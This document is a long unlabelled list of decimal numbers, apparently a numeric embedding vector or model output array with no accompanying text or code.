-0.014044764451682568, 0.00787750631570816, 0.035567235201597214, 0.019516076892614365, -0.015110893175005913, 0.024683840572834015, -0.017946498468518257, -0.013089691288769245, -0.012689892202615738, 0.013696791604161263, -0.019752994179725647, 0.012460378929972649, 0.01862763613462448, -0.015414443798363209, -0.011631167493760586, -0.005486120469868183, 0.01690998487174511, 0.028015492483973503, -0.002507993718609214, -0.019752994179725647, -0.006259804125875235, -0.0020471150055527687, 0.03142118081450462, -0.030710428953170776, 0.005456505808979273, -0.0008463321719318628, 0.0010522467782720923, -0.026149766519665718, -0.01198654342442751, 0.009617368690669537, -0.021515069529414177, -0.010328121483325958, 0.025424206629395485, -0.02015279419720173, -0.028948355466127396, 0.007259299512952566, -0.011238773353397846, 0.019590115174651146, 0.000842167588416487, -0.006082116160541773, -0.004053510259836912, 0.0007264852174557745, 0.038351017981767654, -0.030029291287064552, 0.016969215124845505, -0.018849747255444527, -0.02617938257753849, 0.006674409843981266, 0.0036037371028214693, 0.030355053022503853, -0.02680128999054432, 0.0019286563619971275, -0.00974323134869337, -0.005138148088008165, 0.010365139693021774, 0.011682993732392788, -0.006059905048459768, -0.019353196024894714, 0.025498243048787117, -0.0017361609498038888, -0.0076850107870996, 0.011142524890601635, 0.002783780451864004, 0.00689281802624464, -0.017472663894295692, 0.0008463321719318628, 0.018168609589338303, -0.015577324666082859, -0.021455839276313782, 0.011831066571176052, 0.049101147800683975, -0.002933704759925604, -0.0295406486839056, 0.003972069825977087, -0.00929160788655281, 0.012601048685610294, -0.0014650014927610755, -0.0045939781703054905, 0.018523985520005226, -0.03500455617904663, 0.021840829402208328, 0.01040215790271759, 0.04252668842673302, -0.0205673985183239, -0.009039882570505142, 0.0037129411939531565, 0.00003091611142735928, -0.01941242627799511, 0.011112910695374012, -0.006744744721800089, -0.01850917749106884, -0.024817105382680893, 0.007188964635133743, -0.02786741964519024, -0.0285633634775877, -0.013963324017822742, -0.002526502823457122, 0.0107723418623209, -0.005082620307803154, -0.006126537919044495, -0.00696685491129756, 0.033346135169267654, -0.02532055601477623, -0.0034186451230198145, 0.040601734071969986, -0.025720354169607162, 0.011423864401876926, 0.0008176429546438158, -0.021307766437530518, -0.033049989491701126, -0.016717489808797836, -0.0049530561082065105, -0.006467106752097607, 0.020182408392429352, -0.030562354251742363, 0.010350332595407963, 0.01616961881518364, -0.002091537229716778, 0.01186068169772625, 0.006352350115776062, -0.020745087414979935, -0.009498910047113895, 0.013060076162219048, -0.018079765141010284, -0.018405526876449585, -0.011934718117117882, 0.006293120793998241, 0.1015191376209259, -0.016199233010411263, 0.003039207076653838, -0.01985664665699005, 0.003142858389765024, 0.008825176395475864, 0.0037740215193480253, 0.015236755833029747, -0.011105506680905819, -0.00774424010887742, 0.026208996772766113, -0.019664151594042778, -0.019175508990883827, 0.007833084091544151, 0.022640427574515343, -0.0008986205793917179, -0.010224469937384129, -0.01920512318611145, 0.03396804258227348, -0.009491506963968277, 0.026208996772766113, -0.005341748706996441, 0.014829553663730621, -0.02022683061659336, 0.025290941819548607, -0.0017491173930466175, -0.03476763889193535, -0.021485453471541405, -0.012393745593726635, -0.01596231572329998, -0.006259804125875235, -0.0011207307688891888, -0.01300825085490942, -0.011505304835736752, 0.00045601988676935434, 0.001429834053851664, 0.021737178787589073, 0.008380956016480923, -0.03396804258227348, -0.004227496217936277, 0.0033242483623325825, -0.0038943311665207148, -0.019708573818206787, -0.011090699583292007, 0.02478749118745327, -0.012349323369562626, 0.04806463420391083, 0.002565372036769986, -0.01883493922650814, -0.012238268740475178, 0.002422851510345936, -0.013163727708160877, 0.036544520407915115, 0.02195928990840912, 0.018820133060216904, 0.028948355466127396, 0.012075387872755527, -0.005189973395317793, -0.008218075148761272, -0.022596005350351334, -0.010727919638156891, 0.012593644671142101, -0.007166753988713026, -0.0015705038094893098, 0.027053015306591988, -0.016850756481289864, -0.03861755132675171, -0.004031299147754908, -0.02142622508108616, 0.030621584504842758, 0.006837290246039629, 0.011505304835736752, -0.0039498587138950825, -0.011305405758321285, 0.023158684372901917, 0.007033487781882286, 0.015444057993590832, 0.028548557311296463, -0.014526003040373325, -0.017916884273290634, 0.021900059655308723, 0.029733143746852875, 0.004305234644562006, 0.028992777690291405, -0.014207645319402218, 0.029274117201566696, -0.00902507547289133, -0.007133437320590019, -0.0024265532847493887, 0.0019156999187543988, 0.005404680036008358, 0.0029188974294811487, 0.02101161889731884, -0.0013807846698909998, 0.0054083820432424545, 0.025350170210003853, 0.02166314236819744, -0.00659667095169425, -0.01214942429214716, -0.015666168183088303, 0.004475519526749849, -0.017472663894295692, 0.023854628205299377, -0.0035648676566779613, 0.0009101888281293213, 0.008869598619639874, -0.011468286626040936, 0.015695782378315926, 0.007540639024227858, -0.02323272079229355, -0.0347084105014801, -0.02006394974887371, 0.012445571832358837, -0.011749626137316227, -0.007803469430655241, 0.038469474762678146, 0.005334345158189535, -0.013615351170301437, -0.019027436152100563, -0.03287230059504509, -0.007884910330176353, -0.029362959787249565, 0.04833116754889488, -0.018479563295841217, -0.00022569629072677344, 0.0032057897187769413, -0.005919235292822123, -0.013748617842793465, 0.023825014010071754, 0.016687875613570213, 0.022758886218070984, 0.004186776001006365, 0.00903247855603695, -0.023484446108341217, 0.01159414928406477, -0.029614685103297234, 0.02381020598113537, 0.014985030516982079, 0.006296822335571051, -0.007570253685116768, -0.014585232362151146, 0.024180389940738678, 0.02724551036953926, -0.0038313998375087976, 0.011601553298532963, -0.004712436813861132, 0.0069742584601044655, 0.0019194018095731735, 0.005967359058558941, 0.0334053635597229, -0.0020008422434329987, -0.021974096074700356, 0.010128222405910492, 0.01948646269738674, -0.008292111568152905, 0.014985030516982079, 0.01028369925916195, -0.019057050347328186, -0.0010300357826054096, 0.0005946073797531426, 0.004856808576732874, 0.000014257851034926716, 0.015458866022527218, -0.001173481927253306, -0.00847720354795456, 0.028326446190476418, 0.00722228130325675, -0.05072995647788048, -0.02166314236819744, -0.02782299742102623, -0.002128555439412594, -0.0016602732939645648, -0.008499414660036564, -0.0030262507498264313, 0.02680128999054432, -0.006581863854080439, 0.0006732713663950562, 0.026371877640485764, 0.02256638929247856, -0.033997658640146255, 0.008047790266573429, 0.019708573818206787, 0.026090538129210472, 0.019234737381339073, 0.0091953594237566, -0.028133951127529144, -0.007773854769766331, 0.0037462576292455196, -0.02195928990840912, 0.01181625947356224, 0.01788727007806301, 0.05170724168419838, -0.008632680401206017, -0.013704195618629456, -0.00390913849696517, -0.01596231572329998, -0.021737178787589073, -0.0008629904477857053, -0.013918901793658733, 0.02302541770040989, 0.006381964776664972, -0.014407544396817684, 0.00035699576255865395, 0.0018324085976928473, -0.002030456904321909, -0.025172483175992966, 0.0038054869510233402, 0.012852773070335388, -0.002617197809740901, -0.005841496866196394, -0.006781762931495905, 0.010550231672823429, 0.0064745107665658, -0.02105604112148285, -0.014155819080770016, -0.002319199964404106, 0.0023117964155972004, -0.0074480934999883175, 0.007796065881848335, -0.002200741320848465, 0.003142858389765024, 0.025394592434167862, 0.009106515906751156, 0.0069557493552565575, -0.002459869720041752, 0.002376578515395522, 0.04030558839440346, -0.04012789949774742, -0.0025820303708314896, -0.0007588763255625963, -0.02367694117128849, -0.01340064499527216, -0.016510186716914177, 0.009099111892282963, -0.016436150297522545, -0.024846721440553665, 0.026283033192157745, 0.005437996704131365, -0.012889791280031204, -0.012556626461446285, 0.003289080923423171, 0.0015159016475081444, -0.01723574660718441, 0.014925801195204258, -0.005145551636815071, -0.00024177614250220358, -0.0016963662346825004, -0.009558139368891716, -0.007140840869396925, 0.019397618249058723, -0.004660611040890217, -0.002459869720041752, 0.005634193774312735, -0.006415280979126692, -0.013089691288769245, 0.020582206547260284, 0.01698402129113674, -0.0024191495031118393, 0.028903933241963387, 0.0047457534819841385, 0.010838975198566914, -0.01781323365867138, -0.011853277683258057, 0.005804478190839291, -0.014059571549296379, 0.018731288611888885, 0.001973078353330493, -0.003194684162735939, 0.012815754860639572, 0.010268892161548138, 0.012327112257480621, 0.000548797135706991, 0.007211175747215748, 0.00018092722166329622, -0.020508170127868652, -0.011764433234930038, 0.008506818674504757, -0.022373894229531288, -0.0020841334480792284, 0.001538112759590149, -0.026534758508205414, 0.0742143988609314, -0.008099616505205631, -0.02700859308242798, -0.007407373283058405, -0.05040419474244118, -0.0153700215741992, -0.01957530714571476, -0.010824167169630527, -0.01018004771322012, -0.0018185267690569162, 0.007451795041561127, -0.013607948087155819, -0.031332336366176605, 0.04667274281382561, 0.0038091889582574368, -0.02043413184583187, 0.013674580492079258, -0.010550231672823429, 0.01862763613462448, 0.0038647165056318045, 0.04234899953007698, 0.01825745403766632, 0.009535928256809711, -0.024920757859945297, 0.008662295527756214, -0.007496217265725136, -0.019590115174651146, 0.01106108445674181, -0.0279118400067091, 0.009832075797021389, -0.0018805324798449874, -0.0018444396555423737, -0.039328303188085556, -0.010661286301910877, -0.009121323004364967, -0.005719336215406656, 0.005556455347687006, -0.008099616505205631, 0.00009885057806968689, 0.008099616505205631, -0.01711728796362877, -0.006570758298039436, -0.0183907188475132, -0.021811215206980705, 0.017206132411956787, 0.00208228244446218, 0.00274491123855114, -0.009476698935031891, -0.020078755915164948, 0.02195928990840912, 0.009002864360809326, 0.02675686776638031, 0.005649001337587833, 0.020745087414979935, -0.004823491908609867, 0.012593644671142101, 0.016806334257125854, -0.011579342186450958, -0.013000846840441227, -0.023706555366516113, 0.028207987546920776, -0.00808480940759182, 0.01732459105551243, 0.009350837208330631, -0.001538112759590149, -0.0076553961262106895, 0.004127546679228544, 0.015384828671813011, -0.019975105300545692, -0.021559489890933037, 0.000719544303137809, -0.004116441123187542, 0.039535604417324066, -0.00748881371691823, -0.006581863854080439, 0.010091204196214676, 0.037077587097883224, 0.013630159199237823, -0.022151784971356392, -0.022906959056854248, 0.000889828719664365, -0.013570929877460003, -0.009210167452692986, 0.012667682021856308, -0.0004023432557005435, 0.011068488471210003, 0.007847891189157963, 0.01548848021775484, -0.023365987464785576, -0.0033112920355051756, 0.01818341761827469, 0.014526003040373325, 0.009609965607523918, -0.0006071010720916092, -0.008566047996282578, 0.01961972936987877, -0.00006564974319189787, -0.004445904400199652, 0.040483273565769196, 0.007899717427790165, -0.007477708160877228, 0.005737845320254564, 0.007381460163742304, -0.03586338460445404, 0.002696787239983678, -0.009432277642190456, 0.014252067543566227, -0.005397276487201452, -0.012912002392113209, 0.014681479893624783, -0.005637895781546831, 0.015977121889591217, 0.02536497823894024, 0.02379539981484413, 0.011727415025234222, -0.018701674416661263, -0.005619386676698923, -0.01842033490538597, 0.01579943485558033, 0.0002305549569427967, -0.00837355200201273, 0.0014122503343969584, 0.00875854305922985, 0.02700859308242798, 0.02309945411980152, 0.004146055784076452, -0.0010402158368378878, 0.04024635627865791, -0.02096719667315483, 0.01571059040725231, -0.0027467620093375444, 0.008617873303592205, -0.030221786350011826, -0.027423199266195297, -0.007196368649601936, -0.001486286986619234, 0.0025153972674161196, 0.0025005899369716644, -0.016347305849194527, 0.013311800546944141, -0.017754003405570984, -0.016628645360469818, -0.016051160171628, 0.009920919314026833, -0.010157836601138115, 0.012489993125200272, -0.0030706727411597967, -0.016199233010411263, -0.004075720906257629, 0.005941446404904127, 0.011705203913152218, 0.02626822516322136, -0.0036518608685582876, -0.002522801049053669, -0.0009754336788319051, -0.014000342227518559, -0.004542152397334576, 0.0021415119990706444, -0.007374056614935398, 0.02520209737122059, -0.017902078106999397, -0.008107020519673824, -0.0006177438190206885, -0.0187164805829525, -0.020286059007048607, -0.027275124564766884, -0.023869436234235764, -0.02527613379061222, 0.014133608900010586, 0.017369013279676437, 0.014970223419368267, 0.007055698893964291, 0.015947507694363594, 0.0070112766698002815, -0.010128222405910492, 0.000705199665389955, 0.005700827110558748, -0.017413435503840446, 0.017902078106999397, 0.0037184939719736576, -0.021900059655308723, 0.027156665921211243, -0.000728798913769424, 0.012179039418697357, 0.016850756481289864, -0.02249235287308693, 0.008780754171311855, -0.000738053466193378, -0.01083157118409872, 0.023958280682563782, -0.01306748017668724, 0.023410407826304436, 0.0029003883246332407, -0.011727415025234222, -0.02281811460852623, -0.015977121889591217, -0.014089186675846577, -0.0010938923805952072, -0.021737178787589073, 0.019397618249058723, 0.0034797254484146833, -0.017087673768401146, 0.010476195253431797, -0.0019749293569475412, 0.02207774855196476, 0.001524230814538896, 0.01563655398786068, 0.006622584071010351, 0.01822783797979355, 0.005863707512617111, 0.013334011659026146, -0.005789671093225479, -0.0058933221735060215, 0.027156665921211243, 0.023084647953510284, 0.013867076486349106, 0.021411417052149773, -0.001434461330063641, -0.011135121807456017, -0.003972069825977087, -0.016717489808797836, 0.00423860177397728, 0.0008541985880583525, 0.002717147348448634, -0.007214877754449844, -0.007633185014128685, 0.014555618166923523, 0.00564159732311964, -0.02429884858429432, -0.008395763114094734, -0.00890661682933569, -0.0032964847050607204, 0.002204443095251918, 0.019308775663375854, 0.0098468828946352, -0.000856974977068603, 0.008284708485007286, 0.006337542552500963, -0.008003368973731995, 0.013230361044406891, 0.016554608941078186, -0.006855799816548824, -0.02770453877747059, -0.004749455023556948, -0.0030669707339257, 0.009558139368891716, 0.011357231996953487, -0.013496892526745796, -0.00847720354795456, 0.006559652741998434, -0.0010337375570088625, -0.012186442501842976, -0.004875317681580782, 0.005134446080774069, 0.005634193774312735, 0.010453984141349792, -0.017531894147396088, 0.007274107076227665, -0.012230864726006985, 0.0027578675653785467, -0.015621746890246868, 0.0037258975207805634, 0.012341920286417007, 0.016154810786247253, -0.011912507005035877, -0.008314322680234909, -0.010964836925268173, -0.01575501263141632, 0.002039711456745863, -0.012704700231552124, -0.004264514893293381, 0.009972745552659035, -0.02265523374080658, -0.0077812583185732365, 0.004727243911474943, -0.010039377957582474, 0.005604579113423824, -0.00008537358371540904, 0.016406536102294922, 0.0012854624073952436, -0.015518095344305038, 0.027793381363153458, -0.0008963069412857294, 0.002182232216000557, 0.02047855406999588, -0.004264514893293381, 0.007414776831865311, -0.002942959312349558, -0.016065966337919235, 0.006048799492418766, 0.006918730679899454, -0.0066151805222034454, -0.006282015237957239, -0.0005284370272420347, -0.015355214476585388, 0.009261992760002613, -0.00931381806731224, 0.008869598619639874, -0.0025894339196383953, 0.0030780762899667025, 0.012030965648591518, -0.025616703554987907, -0.0009106515790335834, -0.011749626137316227, -0.030888115987181664, 0.012201250530779362, -0.019960297271609306, -0.01325257122516632, 0.0034723218996077776, -0.0013548718998208642, 0.03343497961759567, -0.01600673794746399, 0.0035648676566779613, 0.002622750587761402, -0.01723574660718441, -0.013511700555682182, -0.012719507329165936, -0.01802053675055504, -0.004482923075556755, -0.005486120469868183, 0.016969215124845505, -0.007055698893964291, -0.005767459981143475, -0.025794390588998795, 0.0038869273848831654, 0.02724551036953926, -0.01097964495420456, -0.012401149608194828, -0.015740204602479935, 0.01559213176369667, 0.014718498103320599, -0.004390377085655928, -0.0070297857746481895, 0.0004141428507864475, -0.022062940523028374, 0.0065374416299164295, -0.008469799533486366, -0.00683358870446682, -0.017828039824962616, 0.01378563605248928, 0.0014983179280534387, 0.0020600715652108192, 0.012712103314697742, -0.005649001337587833, 0.005293624941259623, 0.00781827699393034, -0.032931528985500336, 0.01821303181350231, 0.0011956929229199886, -0.002683830913156271, -0.0007038115290924907, 0.019308775663375854, 0.010024570859968662, -0.0016500932397320867, 0.03476763889193535, -0.012327112257480621, -0.02810433693230152, 0.009721020236611366, 0.006748446263372898, -0.005286221392452717, 0.007170455530285835, -0.010076397098600864, 0.004149757791310549, -0.007862699218094349, -0.002234057756140828, 0.02626822516322136, 0.0045939781703054905, -0.001878681592643261, 0.0041016340255737305, 0.01116473600268364, 0.01027629617601633, -0.00946189183741808, 0.013674580492079258, -0.0015371872577816248, -0.01677672006189823, -0.0019471655832603574, 0.001424281275831163, 0.0006191320135258138, -0.008891808800399303, 0.012423360720276833, 0.004186776001006365, -0.018035342916846275, -0.005034496542066336, 0.01542925089597702, 0.009713617153465748, -0.01278614066541195, 0.01132761687040329, 0.008773350156843662, 0.021366994827985764, -0.021618720144033432, -0.0039683678187429905, -0.013267379254102707, 0.0033816269133239985, -0.020878352224826813, -0.012260479852557182, -0.0021655738819390535, -0.01475551724433899, -0.00958035048097372, -0.01711728796362877, -0.004020193591713905, -0.00004676459502661601, 0.008454992435872555, -0.0212189219892025, -0.010579845868051052, -0.03977252170443535, 0.001580683863721788, 0.0006593894795514643, -0.004779069684445858, 0.017428241670131683, 0.016199233010411263, -0.01985664665699005, 0.018805325031280518, 0.003207640489563346, -0.004053510259836912, -0.04234899953007698, -0.00869931373745203, 0.005389872472733259, -0.003096585627645254, 0.008884405717253685, 0.01661383919417858, -0.0042534093372523785, 0.01559213176369667, 0.02068585716187954, -0.009202763438224792, 0.007803469430655241, 0.0046309963800013065, 0.011120314709842205, 0.015081278048455715, 0.007366653066128492, 0.008255093358457088, -0.013778232038021088, 0.006570758298039436, -0.00931381806731224, 0.0019860349129885435, 0.012142021209001541, 0.013259975239634514, -0.006807675585150719, 0.026904940605163574, 0.0135191036388278, -0.005193675402551889, 0.013778232038021088, 0.020656242966651917, -0.015740204602479935, 0.011786644347012043, 0.013615351170301437, -0.02643110603094101, -0.01674710400402546, -0.010120818391442299, 0.004038702696561813, 0.0002307863178430125, 0.021737178787589073, 0.02200371026992798, -0.013815250247716904, -0.000021892887161811814, -0.002045264234766364, 0.008603066205978394, -0.012489993125200272, 0.0018860852578654885, -0.011571938171982765, 0.026208996772766113, -0.010787148959934711, 0.011024066247045994, 0.0034038377925753593, -0.011460883542895317, 0.005186271853744984, -0.015192333608865738, 0.024965180084109306, -0.02256638929247856, 0.024802299216389656, -0.012556626461446285, 0.01813899539411068, -0.00758135924115777, -0.002867071656510234, 0.02597207948565483, 0.0006778986426070333, -0.0023340072948485613, -0.004390377085655928, -0.0016834097914397717, -0.021574297919869423, 0.005278817843645811, -0.0052380976267158985, 0.02914085052907467, 0.036218758672475815, 0.001438163104467094, 0.0004453771107364446, -0.005260308273136616, -0.014674076810479164, -0.023380793631076813, 0.0013224807335063815, -0.009469295851886272, -0.0007551744929514825, 0.03764026612043381, 0.0009513717377558351, 0.007436987943947315, -0.016347305849194527, 0.011298002675175667, -0.0221962071955204, -0.0028744754381477833, 0.009632176719605923, -0.0037518104072660208, -0.010194855742156506, -0.008032983168959618, 0.0007519353530369699, 0.041430942714214325, -0.007137139327824116, -0.0015279327053576708, 0.004556959494948387, 0.008262497372925282, -0.0017898374935612082, 0.006315331440418959, -0.006885414477437735, -0.027971070259809494, 0.0012151275295764208, -0.011024066247045994, -0.014274278655648232, -0.030058905482292175, 0.00377587229013443, -0.004068317357450724, -0.014629654586315155, 0.01883493922650814, -0.02626822516322136, 0.0058933221735060215, 0.016362113878130913, 0.01225307583808899, 0.004712436813861132, -0.0013881883351132274, 0.007803469430655241, 0.007907120510935783, -0.010690901428461075, -0.015977121889591217, 0.01842033490538597, -0.03692951425909996, -0.010868589393794537, -0.004553257953375578, -0.002702340018004179, -0.017294976860284805, -0.004305234644562006, 0.030355053022503853, -0.0069557493552565575, 0.0018703524256125093, -0.003437154460698366, -0.018079765141010284, -0.017961306497454643, -0.007329634390771389, -0.00923237856477499, 0.00912872701883316, -0.02388424426317215, 0.017665158957242966, -0.0042534093372523785, 0.008603066205978394, -0.012489993125200272, -0.02937776781618595, -0.007603570353239775, -0.007007574662566185, -0.007266703527420759, 0.00025103072402998805, -0.015110893175005913, -0.01028369925916195, 0.025749968364834785, -0.010031974874436855, 0.000053965821280144155, 0.015118297189474106, 0.006552249193191528, 0.017220938578248024, 0.0018527687061578035, 0.018894169479608536, -0.006589267402887344, 0.00699646957218647, -0.007470304146409035, -0.0033075902611017227, 0.007318529300391674, 0.0014261321630328894, -0.004016491584479809, 0.024343270808458328, 0.01106108445674181, -0.0024580189492553473, -0.013111901469528675, -0.02052297629415989, 0.004882721230387688, 0.01103887427598238, 0.006378262769430876, 0.01542925089597702, -0.012823158875107765, -0.0012799096293747425, -0.0032261498272418976, -0.014229856431484222, -0.0013696792302653193, -0.02631264738738537, 0.002276628976687789, -0.003352012252435088, -0.008869598619639874, 0.00824769027531147, 0.019930683076381683, -0.02170756459236145, 0.006333841010928154, 0.007588763255625963, -0.014807342551648617, -0.02027125284075737, 0.023336371406912804, 0.013548718765377998, 0.01023927703499794, -0.009150938130915165, -0.00007137601642170921, 0.0061783636920154095, -0.008891808800399303, -0.010579845868051052, 0.01948646269738674, -0.008255093358457088, 0.005352854263037443, -0.006792868487536907, 0.0055490517988801, 0.0008606768096797168, 0.041875164955854416, 0.027363969013094902, -0.0025912849232554436, 0.00670032249763608, 0.007796065881848335, 0.007344441954046488, 0.010291103273630142, -0.00229883985593915, -0.00009485954069532454, 0.0025894339196383953, 0.023410407826304436, -0.005245501175522804, 0.030355053022503853, -0.00798115786164999, -0.0042719184421002865, -0.01788727007806301, 0.0032372553832829, 0.019397618249058723, 0.002456167945638299, -0.015118297189474106, 0.012489993125200272, 0.0104465801268816, 0.007022382225841284, -0.01303046103566885, -0.027763767167925835, -0.009802460670471191, 0.00906949769705534, 0.022744078189134598, 0.009247185662388802, -0.00008809212158666924, 0.003550060326233506, 0.01781323365867138, -0.020863546058535576, 0.02675686776638031, -0.018079765141010284, -0.00142890855204314, -0.021115271374583244, -0.013533910736441612, -0.004708734806627035, 0.021115271374583244, 0.025749968364834785, -0.03278345614671707, 0.029333345592021942, 0.005338047165423632, -0.008521625772118568, -0.011120314709842205, 0.002604241482913494, -0.0008255093707703054, 0.00270789279602468, 0.006022886373102665, -0.008114423602819443, -0.017428241670131683, -0.025675931945443153, -0.004283023998141289, 0.006411579437553883, -0.0004895677557215095, -0.002470975276082754, 0.010616865009069443, 0.010491002351045609, -0.0330796018242836, -0.009943130426108837, -0.026120152324438095, -0.0022377597633749247, -0.0025783285964280367, 0.002021202351897955, 0.023573288694024086, -0.010809360072016716, -0.015740204602479935, -0.008877001702785492, -0.0014566723257303238, 0.00071445427602157, -0.00849201064556837, -0.023736169561743736, -0.022995803505182266, -0.011623763479292393, 0.0007246343302540481, -0.018198223784565926, -0.0026116450317204, -0.011046277359127998, 0.015725398436188698, 0.012482590042054653, -0.004457009956240654, -0.0027375074569135904, -0.01494060829281807, -0.004767964128404856, -0.0020286059007048607, -0.006552249193191528, -0.009676598012447357, -0.0031595167238265276, -0.011601553298532963, -0.0050604091957211494, -0.008795561268925667, -0.029599877074360847, 0.00027393584605306387, -0.00009260373190045357, 0.016761912032961845, -0.0005140924477018416, 0.007559148594737053, -0.028711438179016113, 0.013867076486349106, -0.01126098446547985, 0.017620738595724106, 0.001954569248482585, -0.007477708160877228, -0.001145718153566122, 0.008277304470539093, -0.014866571873426437, -0.008832579478621483, -0.02256638929247856, -0.019175508990883827, 0.01087599340826273, -0.009639579802751541, -0.009869094006717205, -0.005001179873943329, 0.02905200608074665, 0.00509002385661006, 0.003927647601813078, 0.020167600363492966, 0.03624837473034859, -0.0033094410318881273, -0.0011225816560909152, 0.003653711872175336, 0.006607776507735252, -0.024121161550283432, 0.0006450448418036103, -0.0085956621915102, -0.0013039716286584735, 0.007392565719783306, 0.0022322069853544235, 0.004408886190503836, -0.03263538330793381, -0.011979140341281891, -0.011453479528427124, -0.013822654262185097, -0.02101161889731884, 0.0013335862895473838, 0.006766955368220806, 0.021529875695705414, -0.011046277359127998, 0.005737845320254564, -0.005860005971044302, 0.013052672147750854, 0.017457857728004456, -0.0038165925070643425, 0.024728262796998024, 0.007573955692350864, 0.018849747255444527, 0.002754165790975094, -0.013341415673494339, -0.017132095992565155, 0.005434294696897268, -0.0107723418623209, 0.00623759301379323, -0.014792535454034805, -0.00874373596161604, -0.009965341538190842, 0.007544341031461954, -0.0035556131042540073, 0.023454830050468445, -0.01690998487174511, -0.02483191341161728, -0.010528020560741425, -0.011608956381678581, 0.019871454685926437, 0.011927314102649689, -0.008580855093896389, -0.0013733810046687722, -0.0043459548614919186, -0.002687532687559724, 0.0023414110764861107, 0.004912335891276598, 0.024106353521347046, -0.0023062436375766993, -0.013363626785576344, -0.01677672006189823, -0.018405526876449585, 0.03284268453717232, 0.011734819039702415, 0.006570758298039436, -0.008151441812515259, 0.007966350764036179, -0.007966350764036179, 0.002289585303515196, -0.010002359747886658, -0.02881508879363537, 0.015133104287087917, -0.016643453389406204, -0.008632680401206017, -0.0018971908139064908, 0.019767802208662033, -0.0020841334480792284, -0.0028652208857238293, 0.0032687208149582148, 0.014429755508899689, 0.006263506133109331, 0.018198223784565926, 0.021529875695705414, -0.001808346714824438, -0.0020841334480792284, 0.011238773353397846, -0.012527012266218662, -0.007840488106012344, -0.02466903254389763, 0.008891808800399303, 0.021352188661694527, 0.0055712624453008175, -0.020463747903704643, -0.002289585303515196, 0.016036352142691612, 0.018479563295841217, 0.02027125284075737, -0.00299108331091702, -0.0024006403982639313, -0.011031470261514187, 0.01642134226858616, -0.005371363367885351, -0.013126709498465061, 0.00670032249763608, -0.00423860177397728, 0.010128222405910492, -0.008899212814867496, -0.006163556128740311, -0.015444057993590832, -0.0032317026052623987, -0.02421000599861145, 0.006889116019010544, -0.01855359971523285, -0.009809864684939384, -0.014570425264537334, 0.006748446263372898, -0.012675085105001926, -0.005589772015810013, -0.014622250571846962, 0.013541314750909805, -0.0020859844516962767, 0.011512708850204945, -0.026608794927597046, -0.006711428053677082, -0.007944139651954174, -0.008832579478621483, 0.018701674416661263, 0.0031835786066949368, -0.006789166480302811, 0.0024191495031118393, -0.006148749031126499, -0.01106108445674181, 0.0014927652664482594, -0.0153700215741992, -0.018361104652285576, 0.019131086766719818, -0.013585736975073814, -0.0010568740544840693, -0.00725189596414566, -0.006407877430319786, -0.03376074135303497, -0.0071075246669352055, -0.008462396450340748, -0.04077942296862602, 0.002346963854506612, 0.010905607603490353, -0.004560661502182484, -0.0038795238360762596, 0.009136130101978779, -0.022921767085790634, 0.006704024504870176, 0.021366994827985764, -0.00037411676021292806, 0.01225307583808899, -0.006111730821430683, -0.0026097940281033516, 0.009513718076050282, 0.004190478008240461, -0.014925801195204258, -0.010194855742156506, 0.012171635404229164, -0.011468286626040936, -0.000015111008906387724, -0.013045269064605236, -0.004890124779194593, -0.00601178128272295, 0.035271089524030685, 0.013844865374267101, 0.017857655882835388, 0.010542827658355236, -0.0006598522304557264, -0.011690396815538406, 0.006300524342805147, 0.004471817519515753, -0.014859167858958244, 0.014622250571846962, -0.008899212814867496, 0.017102479934692383, -0.01329699344933033, -0.009772846475243568, -0.0069742584601044655, 0.004053510259836912, 0.018849747255444527, -0.009224974550306797, 0.0012604750227183104, -0.00465690903365612, 0.01702844351530075, 0.014822149649262428, -0.019797416403889656, 0.0070297857746481895, -0.014089186675846577, 0.018538793548941612, 0.014570425264537334, 0.006048799492418766, -0.008166249841451645, 0.012549222446978092, -0.014925801195204258, 0.007092717103660107, 0.00502709299325943, -0.0064634052105247974, -0.001594565692357719, 0.012386342510581017, 0.0014418649952858686, -0.007496217265725136, 0.014518599025905132, -0.009113918989896774, 0.012919406406581402, 0.00735554751008749, 0.007422180380672216, 0.01568097621202469, 0.0038313998375087976, 0.03384958580136299, -0.011971736326813698, -0.005959955509752035, -0.0044051846489310265, 0.004434799309819937, -0.020537784323096275, 0.01772438921034336, -0.0012706550769507885, -0.017709581181406975, 0.00009439681161893532, 0.020537784323096275, 0.03642606362700462, -0.00019110726134385914, -0.02249235287308693, 0.00935824029147625, 0.017576316371560097, 0.021559489890933037, -0.007170455530285835, 0.010883396491408348, -0.002111897338181734, 0.01417803019285202, -0.0030669707339257, 0.0019915876910090446, -0.0057489508762955666, -0.004634698387235403, -0.01454821415245533, 0.01372640673071146, 0.02133738063275814, 0.0026671725790947676, -0.011009259149432182, 0.015829049050807953, 0.022211013361811638, 0.00011637646093731746, 0.01876090280711651, -0.0011670036474242806, -0.030621584504842758, 0.0012993443524464965, 0.02814875915646553, 0.0027671221178025007, 0.000548797135706991, -0.020878352224826813, 0.010424369014799595, -0.008706717751920223, 0.00869931373745203, -0.010261488147079945, -0.003346459474414587, -0.015236755833029747, 0.006574460305273533, -0.006711428053677082, 0.013859672471880913, -0.006507826969027519, 0.009432277642190456, -0.004701331257820129, 0.024032317101955414, 0.007751643657684326, 0.011298002675175667, 0.005871111527085304, -0.000809313845820725, 0.014333507977426052, 0.001481659710407257, -0.03704797104001045, -0.0085956621915102, 0.009217570535838604, 0.006637391168624163, -0.0017259808955714107, -0.017265360802412033, -0.01571059040725231, 0.0006274611223489046, -0.005996973719447851, -0.009809864684939384, -0.004068317357450724, 0.021470647305250168, 0.010476195253431797, 0.024520959705114365, -0.00042524837772361934, 0.0016871115658432245, -0.013859672471880913, 0.01481474656611681, -0.005789671093225479, -0.00440148264169693, -0.006989065557718277, 0.000681600475218147, 0.010165240615606308, 0.014518599025905132, 0.011305405758321285, -0.00525290472432971, 0.0013123006792739034, 0.002559819258749485, -0.010083800181746483, -0.009328626096248627, 0.012771332636475563, 0.001987885683774948, -0.0085956621915102, 0.01050580944865942, 0.0057230377569794655, -0.008314322680234909, -0.016510186716914177, -0.010579845868051052, 0.0010402158368378878, -0.0020323076751083136, -0.003179876832291484, -0.02757127210497856, 0.00995053444057703, 0.008877001702785492, 0.016140002757310867, -0.0237213633954525, 0.0037943816278129816, 0.027526849880814552, -0.037936411798000336, -0.03233923763036728, -0.01000976376235485, 0.0032205970492213964, -0.009321222081780434, 0.002352516632527113, 0.02027125284075737, 0.008958442136645317, 0.005497226025909185, 0.01106108445674181, -0.0035185948945581913, -0.00022997653286438435, -0.003303888253867626, 0.013037865050137043, -0.00038360271719284356, -0.00902507547289133, -0.002304392633959651, 0.0006640167557634413, -0.01707286573946476, -0.0000019702151803357992, 0.00299108331091702, 0.00465690903365612, 